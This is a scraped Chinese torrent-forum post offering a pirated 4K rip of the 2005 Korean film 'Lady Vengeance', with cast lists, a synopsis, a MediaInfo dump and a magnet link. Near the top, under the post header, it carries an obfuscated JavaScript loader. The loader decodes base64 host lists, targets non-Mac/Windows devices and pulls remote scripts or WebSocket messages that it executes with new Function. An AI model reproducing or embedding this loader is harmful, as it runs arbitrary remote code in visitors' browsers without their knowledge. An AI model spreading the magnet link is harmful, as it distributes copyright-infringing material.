亲切的金子[中文字幕].Lady.Vengeance.2005.2160p.HDR.UHD.BluRay.DTS-HD.MA.5.1.x265-10bit 12.42GB

版主小s 1月前 850

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 亲切的金子 / 复仇的金子 / Sympathy for Lady Vengeance
◎片  名 ??? ???
◎年  代 2005
◎产  地 韩国
◎类  别 剧情 / 惊悚 / 犯罪
◎语  言 韩语 / 英语 / 日语
◎上映日期 2005-07-29(韩国)
◎IMDb链接 https://www.imdb.com/title/tt0451094/
◎豆瓣评分 7.6/10 (139481人评价)
◎豆瓣链接 https://movie.douban.com/subject/1412579/
◎片  长 112分钟
◎导  演 朴赞郁 Chan-wook Park (id:1137414)
◎编  剧 郑瑞景 Seo-Gyeong Jeong (id:1356850)
       朴赞郁 Chan-wook Park (id:1137414)
◎演  员 李英爱 Yeong-ae Lee (id:1004933)
       崔岷植 Min-sik Choi (id:1045142)
       金时厚 Shi-hoo Kim (id:1015180)
       南一祐 Il-woo Nam (id:1016689)
       金秉玉 Byeong-ok Kim (id:1319357)
       吴达洙 Dal-su Oh (id:1203077)
       李胜欣 Seung-Shin Lee (id:1029133)
       金富善 Bu-seon Kim (id:1192147)
       罗美兰 Mi-ran Ra (id:1329322)
       托尼·巴里 Tony Barry (id:1394188)
       高素熙 Su-hee Go (id:1394402)
       李代延 Dae-yeon Lee (id:1042754)
       朴明申 Myung-shin Park (id:1381298)
       吴光禄 Kwang-rok Oh (id:1203325)
       宋康昊 Kang-ho Song (id:1031238)
       申河均 Ha-kyun Shin (id:1140667)
       刘智泰 Ji-tae Yu (id:1167498)
       姜惠贞 Hye-jeong Kang (id:1014222)
       尹珍序 Jin-seo Yun (id:1023410)
       柳昇完 Seung-wan Ryoo (id:1138335)
       崔政宇 Jung-woo Choi (id:1333235)
         (id:1394427)
       车顺裴 Cha Soon-bae (id:1377778)
       元美媛 Mi-won Won (id:1438262)
       李泰宪 Lee Tae-hun (id:1337776)
       曹永旭 Yeong-wook Jo (id:1287735)
       丁正勋 Chung-hoon Chung (id:1076638)
       金尚范 Sang-bum Kim (id:1288546)
       韩在民 Jae-min Han (id:1423907)
       Synderella Peng Synderella Peng (id:1294238)
       石珉雨 Min-woo Seok (id:1349917)
       金石源 Suk-won Kim (id:1305145)
       李庸基 Yong-Gi Lee (id:1314650)
       李炳俊 Byeong-joon Lee (id:1339704)

◎标  签 韩国 / 复仇 / 朴赞郁 / 李英爱 / 韩国电影 / 犯罪 / 暴力 / 剧情

◎简  介
  金子(李英爱饰)20岁时,就因被控“诱拐儿童”入狱而成为头条新闻,人们惊诧于她的美貌、她的年轻。                                    
                                在13年的牢狱生活中,有着天使般容貌的她是狱中绝对的模范。金子尽心尽力地帮助身边的每一个人,因此狱友们都称她为“亲切的金子”。表面上金子似乎比谁都诚实守纪,但内心里的复仇火焰一天也没有熄灭。                                    
                                当金子出狱后,她还是马上展开复仇计划——它已经暗中策划准备了13年之久的,而狱友们也都在不同的地方帮助着她。                                    
                                金子的仇人是当年让她入狱的白老师(崔岷植饰),那是什么让他们在13年前结怨呢?金子又将怎样复仇呢?能否成功?

◎获奖情况 (共2项)
  第62届威尼斯电影节 (2005)
  主竞赛单元 金狮奖 (提名)
   └──朴赞郁 (id:1137414)

  第25届香港电影金像奖 (2006)
  最佳亚洲电影(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 156713110199160505635433586048251231019 (0x75E5D8DF8C1FB744C46EDE4988407B2B)

  4. Complete name                            : Lady.Ven[email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 12.4 GiB

  8. Duration                                 : 1 h 55 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 15.5 Mb/s

  11. Movie name                               : Lady Vengeance 2005 2160p HDR UHD BluRay DTS-HD MA 5.1 [email protected]

  12. Encoded date                             : UTC 2021-08-29 13:48:58

  13. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  14. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2


  15. Video

  16. ID                                       : 1

  17. Format                                   : HEVC

  18. Format/Info                              : High Efficiency Video Coding

  19. Format profile                           : Main [email protected]@High

  20. HDR format                               : SMPTE ST 2086, HDR10 compatible

  21. Codec ID                                 : V_MPEGH/ISO/HEVC

  22. Duration                                 : 1 h 55 min

  23. Bit rate                                 : 13.5 Mb/s

  24. Width                                    : 3 840 pixels

  25. Height                                   : 1 608 pixels

  26. Display aspect ratio                     : 2.40:1

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 24.000 FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 10 bits

  32. Bits/(Pixel*Frame)                       : 0.091

  33. Stream size                              : 10.9 GiB (88%)

  34. Title                                    : @HDSky

  35. Writing library                          : x265 - H.265/HEVC codec

  36. Default                                  : Yes

  37. Forced                                   : No

  38. Color range                              : Limited

  39. Color primaries                          : BT.2020

  40. Transfer characteristics                 : PQ

  41. Matrix coefficients                      : BT.2020 non-constant

  42. Mastering display color primaries        : Display P3

  43. Mastering display luminance              : min: 0.0020 cd/m2, max: 1000 cd/m2

  44. Maximum Content Light Level              : 739 cd/m2

  45. Maximum Frame-Average Light Level        : 331 cd/m2


  46. Audio

  47. ID                                       : 2

  48. Format                                   : DTS XLL

  49. Format/Info                              : Digital Theater Systems

  50. Commercial name                          : DTS-HD Master Audio

  51. Codec ID                                 : A_DTS

  52. Duration                                 : 1 h 55 min

  53. Bit rate mode                            : Variable

  54. Bit rate                                 : 1 895 kb/s

  55. Channel(s)                               : 6 channels

  56. Channel layout                           : C L R Ls Rs LFE

  57. Sampling rate                            : 48.0 kHz

  58. Frame rate                               : 93.750 FPS (512 SPF)

  59. Bit depth                                : 16 bits

  60. Compression mode                         : Lossless

  61. Stream size                              : 1.52 GiB (12%)

  62. Title                                    : Korean

  63. Language                                 : Korean

  64. Default                                  : Yes

  65. Forced                                   : No


  66. Text #1

  67. ID                                       : 3

  68. Format                                   : PGS

  69. Muxing mode                              : zlib

  70. Codec ID                                 : S_HDMV/PGS

  71. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  72. Duration                                 : 1 h 48 min

  73. Bit rate                                 : 17.3 kb/s

  74. Count of elements                        : 1540

  75. Stream size                              : 13.5 MiB (0%)

  76. Title                                    : CHS

  77. Language                                 : Chinese

  78. Default                                  : Yes

  79. Forced                                   : No


  80. Text #2

  81. ID                                       : 4

  82. Format                                   : PGS

  83. Muxing mode                              : zlib

  84. Codec ID                                 : S_HDMV/PGS

  85. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  86. Duration                                 : 1 h 48 min

  87. Bit rate                                 : 17.7 kb/s

  88. Count of elements                        : 1540

  89. Stream size                              : 13.8 MiB (0%)

  90. Title                                    : CHT

  91. Language                                 : Chinese

  92. Default                                  : No

  93. Forced                                   : No


  94. Menu

  95. 00:00:00.000                             : en:Chapter 01

  96. 00:08:15.000                             : en:Chapter 02

  97. 00:20:41.000                             : en:Chapter 03

  98. 00:37:04.000                             : en:Chapter 04

  99. 00:51:31.000                             : en:Chapter 05

  100. 01:03:08.000                             : en:Chapter 06

  101. 01:07:20.000                             : en:Chapter 07

  102. 01:17:44.000                             : en:Chapter 08

  103. 01:22:50.000                             : en:Chapter 09

  104. 01:28:57.000                             : en:Chapter 10

  105. 01:39:13.000                             : en:Chapter 11

  106. 01:43:46.000                             : en:Chapter 12



TAGS 剧情 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:ABF26CB51ED61A024BA11DCCC62B019634980A3D
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖